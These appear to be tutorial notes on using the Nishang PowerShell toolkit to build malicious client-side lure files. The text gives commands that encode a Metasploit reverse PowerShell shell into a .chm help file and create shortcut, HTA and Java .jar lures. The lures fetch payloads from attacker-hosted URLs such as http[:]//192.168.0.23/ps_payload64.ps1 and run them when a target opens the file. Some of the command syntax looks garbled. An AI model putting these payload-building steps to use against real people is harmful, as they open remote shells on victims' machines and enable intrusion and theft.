- To generate a properly compressed, encoded script, load ". .\nishang\Utility\Invoke-Encode.ps1" then run "Invoke-Encode -Data " then run "Invoke-Encode -DataToEncode .\reverse_powershell.ps1 -OutCommand", where the value of DataToEncode is the cmd reverse PowerShell from Metasploit. Once this encoded shell code is stored in a file encoded.txt, use the copied content with the Out-CHM script: "Out-CHM -Payload "-e " -HHCPath 'C:\Program Files (x86)\HTML Help Workshop encoded_shell_code '". This creates a .chm file.
- The Out-Shortcut.ps1 script has the same syntax as Out-CHM: "Out-Shortcut -PayloadURL url_of_meterpreter_reverse_shell"
- The script ..\nishang\Client\Out-HTA.ps1 generates an HTML application and a VBScript, both of which can be hosted on a web server. The link to the HTA is sent to the target; once the target chooses to open it, a PowerShell payload or script is executed on the target. "Out-HTA -PayloadURL http[:]//192.168.0.23/ps_payload64.ps1"
- The script ..\nishang\Client\Out-Java.ps1 creates a .jar and an HTML file which loads the .jar file. "Out-Java -PayloadURL http[:]//192.168.2.12/ps_payload.ps1 -JDKPath C:\Program Files\Java\jdk1"